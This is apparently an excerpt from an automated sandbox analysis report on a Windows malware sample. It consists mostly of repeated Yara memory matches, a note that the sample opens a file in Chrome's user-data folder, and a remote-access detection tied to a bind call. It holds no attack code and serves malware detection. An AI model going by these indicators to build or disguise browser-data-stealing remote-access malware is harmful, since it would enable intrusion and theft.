Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500 Jump to behavior
Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D12B5D bind,WSAGetLastError, 2_2_00007FFD93D12B5D
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs